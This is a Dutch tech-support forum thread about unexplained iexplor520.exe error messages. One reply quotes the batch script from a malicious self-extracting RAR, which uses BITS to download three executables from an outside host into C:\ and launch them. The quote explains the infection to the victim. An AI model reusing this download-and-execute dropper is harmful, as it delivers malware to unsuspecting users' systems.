iexplor520.exe Dr.Web Mkxi Application

Status
Niet open voor verdere reacties.
G

Guzzler

Gebruiker
Lid geworden
9 apr 2007
Berichten
204
Hallo,

Sinds een kwartier krijg ik meldingen dat iexplor520.exe, dat deze niet gevonden kan worden.
2rrazkn.jpg


Daarna krijg ik nog een tweetal andere meldingen te zien.
akap12.jpg

332tfy9.jpg


Iemand enig idee waar dit vanaf komt? en misschien nog belangrijker, hoe ik het kan oplossen?
Alvast bedankt!
 
U gebruikt de gewone IE 8 of IE 7?

mvg Timothy
 
Laatst bewerkt door een moderator:
Ik gebruik FireFox, maar Internet Explorer 7 is geïnstalleerd. Hier kreeg ik via Scotty (WinPatrol) vandaag ook een melding van dat iets van Internet Explorer wilde opstarten o.i.d. Deze heb ik niet geaccepteerd.
 
Guzzler zei:
Ik gebruik FireFox, maar Internet Explorer 7 is geïnstalleerd. Hier kreeg ik via Scotty (WinPatrol) vandaag ook een melding van dat iets van Internet Explorer wilde opstarten o.i.d. Deze heb ik niet geaccepteerd.
Klik om te vergroten...

Verwijder IE dan?
Mss is het probleem dan van de baan?
 
Sinds ik deze vraag heb gesteld, heb ik nog maar 1 keer de meldingen gehad, hierna niet meer. Evengoed bedankt voor de hulp.:thumb:
 
Heb je toevallig daarvoor net iets van internet gedownload? Een self-executable RAR file?

Dan heb je waarschijnlijk een RAR te pakken die wat kwaad wilde doen. De self-executable rar start nl. een bat file op die de volgende inhoud heeft:
@echo off
ren lsass lsass.exe
start "" "NaamRarDieJeHebtGedownload.exe"
net start bits
IF NOT EXIST C:\nul mkdir C:\
lsass.exe /transfer jman /download /priority high http://binuser.fileave.com/IC/<scrambled>.exe "C:\Iexplor701.exe"
IF NOT EXIST C:\nul mkdir C:\
lsass.exe /transfer jman /download /priority high http://binuser.fileave.com/convert/<scrambled>.exe "C:\iexplor520.exe"
IF NOT EXIST C:\nul mkdir C:\
lsass.exe /transfer jman /download /priority high http://binuser.fileave.com/beam/<scrambled>.exe "C:\Iexplore987.exe"
start "" "C:\Iexplor701.exe"
start "" "C:\iexplor520.exe"
start "" "C:\Iexplore987.exe"
Klik om te vergroten...

Deze start de BITS service en download de 3 exe bestanden en probeert deze op te starten. Het geluk is dat je Vista gebruikt met waarschijnlijk UAC nog steeds aan. Hierdoor heb je geen rechten om in C:\ te schrijven en kan de malware niet gestart worden.

Ik heb deze files afzonderlijk door de kaspersky online file scanner geduwd, maar die gaf aan dat deze files "clean" waren. Ik betwijfel het echter.
 
De UAC heb ik uitgeschakeld, ik heb al gescand met Mallware Bytes'.
Sinds mijn vorige post heb ik er geen last meer van, maar het kan ook op de achtergrond draaien natuurlijk.
Ik zal ook eens scannen met McAfee 8.5i, en dan vooral die bestanden die jij zojuist aangaf.
Bedankt voor de hulp! zijn er anders nog andere alternatieven als deze niks vind, of heb ik er dan geen last van?
 
Status
Niet open voor verdere reacties.
                    Steun ons                    

Nieuwste berichten

Terug
Bovenaan Onderaan